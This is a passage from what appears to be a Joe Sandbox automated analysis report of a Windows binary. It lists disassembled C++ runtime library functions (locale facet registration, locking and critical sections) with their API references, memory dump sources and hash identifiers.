                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • messages.LIBCPMT ref: 00A5E923
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5E93A
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5E95A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                      • String ID:
                                                      • API String ID: 2750803064-0
                                                      • Opcode ID: 197f734a79b37de03c9faf48f75891bb4256f9bbe7d057db6d02dd24eff09d13
                                                      • Instruction ID: 7f35c7632251c480955c928a06275d0d88d9554a101f3c11a6c06cb3d6b4c4a1
                                                      • Opcode Fuzzy Hash: 197f734a79b37de03c9faf48f75891bb4256f9bbe7d057db6d02dd24eff09d13
                                                      • Instruction Fuzzy Hash: C501C036900115DFCF08FBA49A41ABEB7B1BF90721F24080AF810AB291CF789F098791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5E843 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5E84A
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5E854
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • collate.LIBCPMT ref: 00A5E88E
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5E8A5
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5E8C5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                      • String ID:
                                                      • API String ID: 1007100420-0
                                                      • Opcode ID: 1eec2354626d5ced291a52d2b524d50bc1d6c16186c34a6d788c062b56d0736b
                                                      • Instruction ID: aa246d2e971d650ffe7dc31e8e8db8da3e0e70fc558a2ffdd48241758db6da08
                                                      • Opcode Fuzzy Hash: 1eec2354626d5ced291a52d2b524d50bc1d6c16186c34a6d788c062b56d0736b
                                                      • Instruction Fuzzy Hash: AA01D6369001159FCB08FBA4D941AAE77B5BF84711F244409FC106B2D1CF749F09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A529F6 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A529FD
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52A07
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A52A41
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52A58
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52A78
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0
                                                      • Opcode ID: baf8837db2182054f56490f48b97d25555c7f8d7b9232589db9e857b6ffe7bad
                                                      • Instruction ID: 915f6083bdba9bf78d2df93f918017965a907fb83030d1891c23112f057583b5
                                                      • Opcode Fuzzy Hash: baf8837db2182054f56490f48b97d25555c7f8d7b9232589db9e857b6ffe7bad
                                                      • Instruction Fuzzy Hash: FA01C0369001259BCB15FBA4D951BBE77B1BF94721F240409FD0067291DF749E4A8790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52961 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52968
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52972
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A529AC
                                                      • std::_Facet_Register.LIBCPMT ref: 00A529C3
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A529E3
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0
                                                      • Opcode ID: 623f01566a4d571e7cc8324a301fe6a1f474a828647cbb8a959628e1286010b0
                                                      • Instruction ID: 947a1a5a1b1623e5c7da214f6f618cd7e91d17014557618246193e5b54c8eb34
                                                      • Opcode Fuzzy Hash: 623f01566a4d571e7cc8324a301fe6a1f474a828647cbb8a959628e1286010b0
                                                      • Instruction Fuzzy Hash: 5501DE36A00119DFCB15FBA4DA42AAEB7B1BF84721F240509FC106B392DF749E098B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52A8B Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52A92
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52A9C
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A52AD6
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52AED
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52B0D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0
                                                      • Opcode ID: 850e548522f6a3fd8241ef1308b3ee052269451f20147dd18809c25584aa4813
                                                      • Instruction ID: 49ee680b1c4b7a10134011530f618f827730f29cb67fbbaca30a3154b9d9894b
                                                      • Opcode Fuzzy Hash: 850e548522f6a3fd8241ef1308b3ee052269451f20147dd18809c25584aa4813
                                                      • Instruction Fuzzy Hash: 9801D636900115DFCB15FBA4D941BAE77B1BF90721F254809FD0067292CF749E05CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5EA97 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5EA9E
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5EAA8
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A5EAE2
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5EAF9
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5EB19
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0
                                                      • Opcode ID: a678897bd842dfa4b63a9b154ed51537b480fa2d3ef02e118eb591fb977d334f
                                                      • Instruction ID: f27d54f0dd228eb00a64e860f02c6d7f4b17e5495560c7f02f3eb2c500a42872
                                                      • Opcode Fuzzy Hash: a678897bd842dfa4b63a9b154ed51537b480fa2d3ef02e118eb591fb977d334f
                                                      • Instruction Fuzzy Hash: 1601D236E00119DFCB18FBB4DA41AAE77B1BF80722F254409F8056B292DF749E09C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52B20 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52B27
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52B31
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A52B6B
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52B82
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52BA2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0
                                                      • Opcode ID: 5d683fcdfa0d88d516b35add942aecdad9627e611b0db0851353c8554be93be2
                                                      • Instruction ID: 68cd126a797bc7c255c76dc8fd3b75fadddde8c1c73040cebc1848eb3cd100b9
                                                      • Opcode Fuzzy Hash: 5d683fcdfa0d88d516b35add942aecdad9627e611b0db0851353c8554be93be2
                                                      • Instruction Fuzzy Hash: 4701D236900225DBCF14FFA4D941ABE77B1BFC4721F250409F8006B292DF749E498791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5EB2C Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5EB33
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5EB3D
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A5EB77
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5EB8E
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5EBAE
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0
                                                      • Opcode ID: 7f3d3e05f1dc33ffb3773e4d67df366fd733392eba32568ad6422aebf4310601
                                                      • Instruction ID: f238ac18baf62092fc160e49476152805c75da804ec2428e3dab015ed8e5ab56
                                                      • Opcode Fuzzy Hash: 7f3d3e05f1dc33ffb3773e4d67df366fd733392eba32568ad6422aebf4310601
                                                      • Instruction Fuzzy Hash: 2D012236900115DFCF04FBA0D981AAEB7B1BF80712F254809F8116B2D1CF748E098B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52D74 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52D7B
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52D85
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • numpunct.LIBCPMT ref: 00A52DBF
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52DD6
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52DF6
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                      • String ID:
                                                      • API String ID: 743221004-0
                                                      • Opcode ID: 3567c547687ade6bb883887e0a68962de8c1629631a1271bca44bb3ed180d571
                                                      • Instruction ID: 408b2b2f1879d89df08b169cd3ff59dc9af0fb53b4940e44b36925fe19cc5ba4
                                                      • Opcode Fuzzy Hash: 3567c547687ade6bb883887e0a68962de8c1629631a1271bca44bb3ed180d571
                                                      • Instruction Fuzzy Hash: E401C0369002159BCF04FBA4DA41BBE77B1BF85721F240809FC1067291CF749E4ACB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A62C4E Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C58
                                                      • LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C8B
                                                      • RtlWakeAllConditionVariable.NTDLL ref: 00A62D02
                                                      • SetEvent.KERNEL32(?,00A42427,00A9E638,00A86B40), ref: 00A62D0C
                                                      • ResetEvent.KERNEL32(?,00A42427,00A9E638,00A86B40), ref: 00A62D18
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                      • String ID:
                                                      • API String ID: 3916383385-0
                                                      • Opcode ID: 678d034b1a60da9e0a18be42ceb6271e15b1924c43edd44114a689fa31901133
                                                      • Instruction ID: e4b7a2b9399cd11640c5fa51db874af14e17d4797ba0e48b7ea98c688239417b
                                                      • Opcode Fuzzy Hash: 678d034b1a60da9e0a18be42ceb6271e15b1924c43edd44114a689fa31901133
                                                      • Instruction Fuzzy Hash: D401F63160A520DFCB15EF98FC48A99BBB5FB49755B11046AF90297330CF309982DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4BB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LocalAlloc.KERNEL32(00000040,00000018,838A949E,?,00000000), ref: 00A4BBA3
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00A4BD7F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AllocConcurrency::cancel_current_taskLocal
                                                      • String ID: false$true
                                                      • API String ID: 3924972193-2658103896
                                                      • Opcode ID: 8218f3e8dde5a76c1edc0a5454d624f2b97ff369173f592fc25b3355d1758825
                                                      • Instruction ID: 808c605a3d86daf70655074b73e85ae0e4ea31e6cfd0419fb752b97221c3ea30
                                                      • Opcode Fuzzy Hash: 8218f3e8dde5a76c1edc0a5454d624f2b97ff369173f592fc25b3355d1758825
                                                      • Instruction Fuzzy Hash: A96193B1D00748DBDB10DFA4C941BEEB7F8FF44704F14826AE855AB281E775AA44CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5D3CB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5D3D2
                                                        • Part of subcall function 00A5254E: __EH_prolog3.LIBCMT ref: 00A52555
                                                        • Part of subcall function 00A5254E: std::_Lockit::_Lockit.LIBCPMT ref: 00A5255F
                                                        • Part of subcall function 00A5254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00A525D0
                                                      • _Find_elem.LIBCPMT ref: 00A5D46E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                      • String ID: %.0Lf$0123456789-
                                                      • API String ID: 2544715827-3094241602
                                                      • Opcode ID: d3563137eb246f336c348523a00361aa1c3d5f7052ade1273596142061a40df7
                                                      • Instruction ID: 2483ab6739bd40b185a132eb413f1a5e19f957d637dfd4472b73d606557b7354
                                                      • Opcode Fuzzy Hash: d3563137eb246f336c348523a00361aa1c3d5f7052ade1273596142061a40df7
                                                      • Instruction Fuzzy Hash: D7416F31900218DFCF15EFA4C980AEEBBB5FF58315F100159EC15AB255DB30EA5ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5D66F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5D676
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48657
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48679
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A486A1
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4880E
                                                      • _Find_elem.LIBCPMT ref: 00A5D712
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                      • String ID: 0123456789-$0123456789-
                                                      • API String ID: 3042121994-2494171821
                                                      • Opcode ID: 40257019e7251952ebfa14c7399a40c4dbd1f7b5bed30fa3ade487f3ba0216af
                                                      • Instruction ID: c25a66b5d1c3a46c3c3b7eed7a0370ba7bee0ddeb52ba7947eea398cf8860f30
                                                      • Opcode Fuzzy Hash: 40257019e7251952ebfa14c7399a40c4dbd1f7b5bed30fa3ade487f3ba0216af
                                                      • Instruction Fuzzy Hash: 0541AB31900219DFCF15EFA8C980ADEBBB5FF58315F500059F811AB256DB30EA5ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6175A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A61761
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492A0
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492C2
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A492EA
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A49422
                                                      • _Find_elem.LIBCPMT ref: 00A617FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                      • String ID: 0123456789-$0123456789-
                                                      • API String ID: 3042121994-2494171821
                                                      • Opcode ID: 3db079eca79d989700c705426c213850bd7ad48b29aeb9b2ef381d6c76898729
                                                      • Instruction ID: 893a4232fad446b7fc0bd62eb82fa966cf28a5bbb888bcb0e79d06882c03135f
                                                      • Opcode Fuzzy Hash: 3db079eca79d989700c705426c213850bd7ad48b29aeb9b2ef381d6c76898729
                                                      • Instruction Fuzzy Hash: A0415835901209EFCF05EFA8D981AEEBBB5BF44314F10045AE821AB252DB349A56CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A58386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5838D
                                                        • Part of subcall function 00A51C42: _Maklocstr.LIBCPMT ref: 00A51C62
                                                        • Part of subcall function 00A51C42: _Maklocstr.LIBCPMT ref: 00A51C7F
                                                        • Part of subcall function 00A51C42: _Maklocstr.LIBCPMT ref: 00A51C9C
                                                        • Part of subcall function 00A51C42: _Maklocchr.LIBCPMT ref: 00A51CAE
                                                        • Part of subcall function 00A51C42: _Maklocchr.LIBCPMT ref: 00A51CC1
                                                      • _Mpunct.LIBCPMT ref: 00A5841A
                                                      • _Mpunct.LIBCPMT ref: 00A58434
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
